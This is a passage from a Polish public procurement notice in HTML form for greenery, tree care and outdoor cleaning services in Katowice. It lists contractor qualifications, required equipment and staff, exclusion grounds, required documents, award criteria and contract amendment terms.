ładowności od 700 kg do 3,5 t) *,o urządzeniem zabezpieczenia ruchu drogowego - tablica zamykająca ,,U-26a" ze strzałą ,,22" lampową halogenową lub LED: wolnostojącą lub na pojazdy i przyczepy 1szt. * Wszystkie pojazdy muszą spełniać normę emisji spalin co najmniej EURO 4.c) kwalifikacje zawodowe i uprawnienia osób skierowanych przez Wykonawcę do realizacji zamówienia - Wykonawca spełni warunek jeżeli wykaże, że dysponuje co najmniej 10 osobami, w tym: dwie osoby o wykształceniu ogrodniczym lub pokrewnym z min 3 letnim stażem pracy przy pracach związanych z pielęgnacją drzew, karczowaniem zagajników i zakładaniem trawników (w usługach ogrodniczych) i innymi czynnościami wskazanymi w opisie przedmiotu zamówienia, co najmniej dwie osoby posiadające uprawnienia do kierowania ruchem drogowym dla osób wykonujących roboty przy drodze, jeden pracownik z ukończonym kursem, szkoleniem lub szkołą w zakresie stosowania środków ochrony roślin, dwie osoby z uprawnieniami pilarza, trzech pracowników fizycznych.D. Część IVa) zdolność zawodowa - Wykonawca spełni warunek, jeżeli wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 1 usługę polegające na wykonaniu zewnętrznych prac porządkowo-czystościowych i utrzymania porządku na powierzchniach utwardzonych o wartości co najmniej 50.000 zł brutto.b) zdolność techniczna - Wykonawca spełni warunek, jeżeli wykaże, że dysponuje lub będzie dysponował następującym wyposażeniem w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami:o środki transportowe do wywozu odpadów - o dopuszczalnej masie całkowitej do 3,5 tony - 2 sztuki,o kosy spalinowe - w ilości minimum 6 szt.,o wyrywacz/ wycinak do chwastów - 6 szt.,o ciągnik z osprzętem do usuwania chwastów - 2 szt.,o zamiatarka o dopuszczalnej masie całkowitej do 3,5 tony - w ilości minimum 1 szt.,o odkurzacz przemysłowy - w ilości minimum 2 szt.,o opryskiwacz plecakowy - 4 szt.,o urządzeniem zabezpieczenia ruchu drogowego - tablica zamykająca ,,U-26a" ze strzałą ,,22" lampową halogenową lub LED: wolnostojącą lub na pojazdy i przyczepy 1szt., * Wszystkie pojazdy muszą spełniać normę emisji spalin co najmniej EURO 4.c) kwalifikacje zawodowe i uprawnienia osób skierowanych przez Wykonawcę do realizacji zamówienia - Wykonawca spełni warunek jeżeli wykaże, że dysponuje co najmniej 6 osobami, w tym: co najmniej dwie osoby posiadające uprawnienia do kierowania ruchem drogowym dla osób wykonujących roboty przy drodze, dwóch pracowników z ukończonym kursem, szkoleniem lub szkołą w zakresie stosowania środków ochrony roślin, dwóch pracowników fizycznych.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu na wezwanie Zamawiającego Wykonawca jest zobowiązany do złożenia następujących dokumentów i oświadczeń:1)	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;2)	zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;3)	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 Pzp;4)	oświadczenie Wykonawcy o:?	braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo - w przypadku wydania takiego wyroku lub decyzji - dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności;?	braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne;?	niezaleganiu w opłacaniu podatków i opłat lokalnych, o których mowa w ustawie o podatkach i opłatach lokalnych (tj. Dz. U. z 2017 r. poz. 1785 z późn. zm.); </span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1)	w zakresie warunku posiadania kompetencji lub uprawnień do prowadzenia określonej działalności, o ile wynika to z odrębnych przepisów na wezwanie Zamawiającego Wykonawca jest zobowiązany do złożenia:?	zezwolenia na prowadzenie działalności w zakresie transportu (wywozu) odpadów zgodnie z ustawą o odpadach (Dz.U. z 2018 r. poz. 21 z późn. zm.) - zezwolenie na transport musi być wystawione na Wykonawcę,2)	w zakresie warunku dotyczącego sytuacji ekonomicznej lub finansowej na wezwanie Zamawiającego Wykonawca jest zobowiązany do złożenia:- dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę min. 100.000 PLN.Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć dokumentów dotyczących sytuacji finansowej lub ekonomicznej wymaganych przez zamawiającego, może złożyć inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku udziału w postępowaniu. 3)	w zakresie warunku dotyczącego zdolności technicznej lub zawodowej określonego na wezwanie Zamawiającego Wykonawca jest zobowiązany do złożenia:a)	wykazu usług (Załącznik Nr 6 do SIWZ) wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy - zgodnie z zapisem Rozdziału V pkt 2 ppkt 3;b)	wykazu sprzętu - wyposażenia zakładu (Załącznik Nr 7 do SIWZ) dostępnego Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami - zgodnie z zapisami Rozdziału V pkt 2 ppkt 3;c)	wykazu osób (Załącznik Nr 8 do SIWZ) skierowanych przez Wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - zgodnie z zapisami Rozdziału V pkt 2 ppkt 3.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">A. Część Ia) zdolność zawodowa - Wykonawca spełni warunek, jeżeli wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 usługi, w ramach których wykonano wycinkę i pielęgnację drzew (w tym jedna na terenach zieleni zabytkowej), sadzenie drzew i krzewów - o wartości łącznie co najmniej 100 000,00 zł brutto.B. Część II a) zdolność zawodowa - Wykonawca spełni warunek, jeżeli wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 2 usługi: jedną obejmująca zewnętrzne prace porządkowo - czystościowe, a drugą polegającą na pielęgnacji zieleni o wartości łącznie co najmniej 100 000,00 zł brutto. C. Część IIIa) zdolność zawodowa - Wykonawca spełni warunek, jeżeli wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 2 usługi polegające na wykonaniu zewnętrznych prac porządkowo-czystościowych i koszenia traw o wartości łącznie co najmniej 100.000 zł brutto.D. Część IVa) zdolność zawodowa - Wykonawca spełni warunek, jeżeli wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 1 usługę polegające na wykonaniu zewnętrznych prac porządkowo-czystościowych i utrzymania porządku na powierzchniach utwardzonych o wartości co najmniej 50.000 zł brutto.</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1.	Wraz z ofertą (wzór OFERTY - odpowiednio do Części Załączniki Nr 1A lub 2A lub 3A lub 4A do SIWZ) Wykonawca składa:1)	aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia z postępowania (według wzoru stanowiącego Załącznik Nr 9 do SIWZ), 2)	aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu (według wzoru stanowiącego Załącznik Nr 10 do SIWZ),3)	Pełnomocnictwo dla osoby podpisującej ofertę w imieniu Wykonawcy lub Wykonawców wspólnie ubiegających się o udzielenie zamówienia, jeżeli umocowanie nie wynika z przepisów prawa lub innych złożonych dokumentów, ustanowionego do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 2.	Zgodnie z art. 24 ust. 11 Pzp Wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej informacji dotyczących kwoty, jaką zamierza przeznaczyć na sfinansowanie zamówienia, firm oraz adresów wykonawców, którzy złożyli oferty w terminie, ceny, terminu wykonania zamówienia i warunków płatności zawartych w ofertach, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 Pzp. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Wzór oświadczenia stanowi Załącznik Nr 5 do SIWZ.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>norma emisji spalin EURO</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">2. Zmiana postanowień umowy może nastąpić wyłącznie na warunkach określonych poniżej:a)	niesprzyjające warunki atmosferyczne (m. in. ulewne deszcze, śnieżyce, powodzie, gwałtowne wichury i inne anomalia pogodowe) uniemożliwią prowadzenie prac przez okres dłuższy niż 7 dni kalendarzowych;b)	zaistnienia okoliczności leżących wyłącznie po stronie Zamawiającego (np. wstrzymanie prac) lub okoliczności niezależnych zarówno od Zamawiającego jak i Wykonawcy, wpływających na termin realizacji zlecenia,c)	nastąpi rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy/ zlecenia; w takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie udokumentowane koszty, które Wykonawca poniósł w związku z realizacją umowy,d)	do dnia 20.12.2018 roku nie zostanie wykorzystana maksymalna kwota przeznaczona na realizację przedmiotu zamówienia; w tym przypadku Zamawiający może przedłużyć termin wykonywania umowy, nie dłużej jednak niż do 31.06.2019 r.e)	maksymalna kwota przeznaczona na realizację przedmiotu zamówienia zostanie wykorzystana przed 20.12.2018 r.; w tym przypadku Zamawiający może skrócić termin wykonywania umowy,f)	wystąpią okoliczności o których mowa w art. 142 ust. 5 ustawy Pzp,g)	w przypadku utraty posiadania bądź własności któregoś z terenów przez Miasto Katowice, Zamawiający może zmniejszyć zakres usług podany w § 1.3. Zmiana postanowień umowy może nastąpić również w przypadku zaistnienia okoliczności, o których mowa w art. 144 